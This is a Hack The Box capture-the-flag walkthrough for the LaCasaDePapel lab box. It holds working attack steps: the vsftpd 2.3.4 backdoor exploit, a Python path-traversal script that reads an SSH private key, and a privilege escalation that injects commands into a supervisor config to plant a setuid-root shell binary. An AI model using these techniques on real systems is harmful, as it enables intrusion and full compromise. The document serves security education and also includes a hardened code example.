LaCasaDePapel @ hackthebox

LaCasaDePapel is a very interesting Linux box with plenty of learning opportunities, such as client authentication with a public key, switching between GET and POST requests, different Node web servers running, etc. Although the machine has been marked as easy, it’s more on the intermediate side.

Enumeration

Let's start with Nmap.

# Nmap 7.70 scan initiated Thu Jul  4 18:22:51 2019 as: nmap -sC -sV -oA nmap 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.028s latency).
Not shown: 948 closed ports, 48 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js Express framework
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  4 18:23:33 2019 -- 1 IP address (1 host up) scanned in 42.86 seconds

Looking at the Nmap results, I chose the FTP server as the first thing to check, and vsftpd 2.3.4 is indeed vulnerable. If you search with searchsploit, you’ll only get a Metasploit module for it, but I used the Python version from GitHub: https://github.com/In2econd/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel/exploit]
└──╼ #./exploit.py 
Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>
Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami
┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel/exploit]
└──╼ #./exploit.py 10.10.10.131 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[+] Connected to backdoor on 10.10.10.131:6200
[+] Response:
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman

Good, but the weird thing is that we get a Psy Shell afterwards. Since I am not a web developer, that was completely new to me, but I do find the project very useful. You can read more about Psy Shell here: https://presentate.com/bobthecow/talks/php-for-pirates

Of course a Psy Shell newbie needs some time to get used to it, but as always there is help for every option, so with a little common sense I managed to find the variable $tokyo and a script in it.

show $tokyo
  > 2| class Tokyo {
    3|  private function sign($caCert,$userCsr) {
    4|          $caKey = file_get_contents('/home/nairobi/ca.key');
    5|          $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
    6|          openssl_x509_export($userCert, $userCertOut);
    7|          return $userCertOut;
    8|  }
    9| }

file_get_contents('/home/nairobi/ca.key')
=> """
   -----BEGIN PRIVATE KEY-----\n
   -----END PRIVATE KEY-----\n
   """

We can also use functions like scandir to list directories, etc.

scandir('./home/berlin')
=> [
     ".",
     "..",
     ".ash_history",
     ".ssh",
     "downloads",
     "node_modules",
     "server.js",
     "user.txt",
   ]
scandir('./home/berlin/.ssh')
PHP Warning:  scandir(./home/berlin/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1
scandir('./home/berlin/downloads')
=> [
     ".",
     "..",
     "SEASON-1",
     "SEASON-2",
     "Select a season",
   ]

Exploitation (+ Enumeration)

Since it is possible to run different PHP functions (except system commands like Exec(), system_exec(), …), I have to confess that I did poke around in different directories and tried to read different files (user.txt can be read, by the way). But so as not to lose focus on the private key that we just obtained, I suggest continuing with that first.

Since there wasn’t much going on on port 80, I focused on port 443 and HTTPS instead. For that, we first need to get a token using a GET request. We then need that token to be able to send a POST request.


After the token is presented, the web server expects a client certificate.
We can generate one on the website by clicking on the “Online CSR Generator”.


We have to sign the CSR with the private key that we’ve got:

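# Sign the CSR with the CA certificate and the recovered CA key
openssl x509 -req -in csr.csr -CA ca.pem -CAkey ca.key -out client.pem -days 365 -CAcreateserial
# Bundle client key, client certificate and CA certificate into a PKCS#12 file
openssl pkcs12 -export -out certificate.p12 -inkey client.key -in client.pem -certfile ca.pem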

If our key was set up correctly, we will see new content being loaded.

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #curl -k -X GET https://10.10.10.131/  --cert ./client.pem --key client.key
...
<div>
<h1>PRIVATE AREA</h1>
<img id="img_wait" src="waiting.gif">
<h2 id="h2_wait">CONECTION TO SERVER<br>
PLEASE WAIT</h2>
<ul id="ui_list" style="display:none">
<li><a href="?path=SEASON-1">SEASON-1</a></li>
<li><a href="?path=SEASON-2">SEASON-2</a></li>
<li><strong>Select a season</strong></li>
</ul>
</div>
</body>
...
┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #curl -k -X GET https://10.10.10.131?path=SEASON-1  --cert ./client.pem --key client.key -s | tidy
...
<h2 id="h2_wait">CONECTION TO SERVER<br>
PLEASE WAIT</h2>
<ul id="ui_list" style="display:none">
<li><a href="/file/U0VBU09OLTEvMDEuYXZp">01.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDIuYXZp">02.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDMuYXZp">03.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDQuYXZp">04.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDUuYXZp">05.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDYuYXZp">06.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDcuYXZp">07.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDguYXZp">08.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDkuYXZp">09.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTAuYXZp">10.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTEuYXZp">11.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTIuYXZp">12.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTMuYXZp">13.avi</a></li>
<li><strong>Donwload a video</strong></li>
</ul>
...

If we check the files in each directory, we notice that the names in the links can actually be decoded from Base64.

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #for i in $(cat ./files);do echo $i | base64 -d >>file1; printf "\r\n" >>file1; done
┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #cat file1
SEASON-1/01.avi
SEASON-1/03.avi
SEASON-1/04.avi
SEASON-1/05.avi
SEASON-1/06.avi
SEASON-1/07.avi
SEASON-1/08.avi
SEASON-1/09.avi
SEASON-1/10.avi
SEASON-1/11.avi
SEASON-1/12.avi
SEASON-1/13.avi

Since the /file/ route takes a Base64-encoded path, we can get LFI.


Since I didn’t know how to continue, I wrote a script to enumerate the system.

┌─[luka@parrot]─[~/Desktop/htb/LaCasaDePapel]
└──╼ $cat ./reques.py 
#!/usr/bin/env python3
import requests
import sys
import base64

# Disable the TLS warning triggered by verify=False (self-signed server certificate)
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Prefix the requested path with a traversal sequence
directory = "../../../.." + sys.argv[1]
print("trying" + directory + '\n')

# The /file/ route expects the path Base64-encoded
b64directory = base64.b64encode(bytes(directory, 'UTF-8')).decode('UTF-8')
url = 'https://10.10.10.131/file/' + b64directory

headers = {'content-type': 'text/html', 'Accept-Charset': 'UTF-8'}
# Authenticate with the client certificate signed earlier
r = requests.get(url, cert=('./client.pem', './client.key'), headers=headers, verify=False)
print(r.text)
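
The script above succeeds because the decoded path is not confined to the download directory. As an added example (not the box's real server.js and not the author's code), here is that pattern beside a hardened version; `BASE_DIR` and both function names are assumptions, with the base directory taken from the scandir() listing earlier.

```javascript
// Added example: hypothetical handler logic, not the box's real server.js.
const path = require('path').posix; // target is Linux, so use POSIX rules

// Assumed base directory, taken from the scandir() listing on this page.
const BASE_DIR = '/home/berlin/downloads';

// Vulnerable pattern: decode the token and join it onto the base directory.
// path.join() normalises "../" segments, so the result can leave BASE_DIR.
function resolveUnsafe(token) {
  const rel = Buffer.from(token, 'base64').toString('utf8');
  return path.join(BASE_DIR, rel);
}

// Hardened pattern: resolve first, then require the result to stay under
// BASE_DIR. Returns the absolute path, or null when the request is rejected.
function resolveSafe(token) {
  // Buffer.from(..., 'base64') silently skips invalid characters,
  // so validate the token shape before decoding.
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(token) || token.length % 4 !== 0) return null;
  const rel = Buffer.from(token, 'base64').toString('utf8');
  if (rel.includes('\0') || path.isAbsolute(rel)) return null;
  const full = path.resolve(BASE_DIR, rel);
  // Trailing separator so a sibling such as "/home/berlin/downloads-old" fails.
  if (!full.startsWith(BASE_DIR + path.sep)) return null;
  return full;
}

// Constructed sample inputs: one token from the SEASON-1 listing and one
// traversal path of the shape the enumeration script sends.
const legit = 'U0VBU09OLTEvMDEuYXZp';
const traversal = Buffer.from('../../../../home/berlin/.ssh/id_rsa').toString('base64');

function demo() {
  return {
    unsafeLegit: resolveUnsafe(legit),
    unsafeTraversal: resolveUnsafe(traversal),
    safeLegit: resolveSafe(legit),
    safeTraversal: resolveSafe(traversal),
  };
}

console.log(demo());
```

`path.resolve()` does not follow symlinks, so a real handler should also run the result through `fs.realpath` before the prefix check.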

Eventually I found an OpenSSH private key.

┌─[luka@parrot]─[~/Desktop/htb/LaCasaDePapel]
└──╼ $./reques.py /home/berlin/.ssh/id_rsa
trying../../../../home/berlin/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

We can log in with that key, though not as berlin but as the “professor” user instead.


In professor's home folder we find two interesting files, memcached.ini and memcached.js. We can write into memcached.js, since its group is “nobody”.

lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x    4 professo professo      4096 Jul 17 12:03 .
drwxr-xr-x    7 root     root          4096 Feb 16 18:06 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jul 17 10:36 .ssh
-rw-r--r--    1 professo professo        24 Jul 17 12:04 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29 01:24 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29 01:31 node_modules
lacasadepapel [~]$ echo "command = nc -lnvp 9999" > memcached.ini

We can also see the memcached.js process being run as “nobody”.


Privilege Escalation

For privilege escalation I created a simple file that assigns a UID and GID of 0 (root) to the user that runs it and starts a shell.

lacasadepapel [~]$ gcc root.c -o root.me                                                                                          
root.c: In function 'main':   
root.c:3:1: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
 setgid(0);              
 ^~~~~~                         
root.c:4:1: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
 setuid(0);                   
 ^~~~~~                        
root.c:5:1: warning: implicit declaration of function 'execl' [-Wimplicit-function-declaration]
 execl("/bin/bash", "sh", 0);    
 ^~~~~                          
root.c:5:1: warning: incompatible implicit declaration of built-in function 'execl'
root.c:5:1: warning: missing sentinel in function call [-Wformat=]

lacasadepapel [~]$ cat memcached.ini 
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
command = sudo -u root /bin/bash -c "chown root:root /home/professor/root.me; chmod u+s /home/professor/root.me"
lacasadepapel [~]$ cat root.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/bash", "sh", 0);
}
lacasadepapel [~]$ ls -la
total 48
drwxr-sr-x    4 professo professo      4096 Jul 17 14:09 .
drwxr-xr-x    7 root     root          4096 Feb 16 18:06 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31 21:36 .ssh
-rw-r--r--    1 professo professo       201 Jul 17 14:14 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29 01:24 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29 01:31 node_modules
-rw-r--r--    1 professo professo       152 Jul 17 13:53 prepare.txt
-rw-r--r--    1 professo professo       148 Jul 17 14:02 prepare2.txt
-rw-r--r--    1 professo professo        70 Jul 17 14:08 root.c
-rwsr-xr-x    1 root     root         10672 Jul 17 14:09 root.me
lacasadepapel [~]$ id
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel [~]$ ./root.me 
lacasadepapel [~]$ id
uid=0(root) gid=0(root) groups=1002(professor)
lacasadepapel [~]$ cat /root/
.ash_history  .cache/       .config/      .node-gyp/    .npm/         .rnd          .ssh/         root.txt      
lacasadepapel [~]$ cat /root/root.txt 
*deleted*